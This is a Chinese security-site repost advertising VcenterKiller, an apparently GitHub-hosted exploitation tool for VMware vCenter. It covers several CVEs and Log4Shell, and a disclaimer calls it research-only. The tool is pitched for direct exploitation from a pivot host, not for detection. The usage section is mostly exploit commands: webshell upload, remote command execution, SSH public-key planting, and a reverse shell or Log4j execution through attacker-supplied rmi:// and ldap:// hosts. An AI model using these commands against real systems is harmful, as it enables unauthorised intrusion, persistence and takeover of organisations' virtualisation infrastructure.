一款针对Vcenter的综合利用工具

admin 2022年10月29日14:43:36评论77 views字数 1173阅读3分54秒阅读模式

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


工具介绍

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。

应用场景

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出


使用方法

go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务./main.exe -u https://xx.xx.com -m 22954 whoami./main.exe -u https://xx.xx.com -m 22972 //get cookie./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656


下载地址

https://github.com/Schira4396/VcenterKiller/

原文始发于微信公众号(天驿安全):一款针对Vcenter的综合利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日14:43:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一款针对Vcenter的综合利用工具https://cn-sec.com/archives/1374466.html

发表评论

匿名网友 填写信息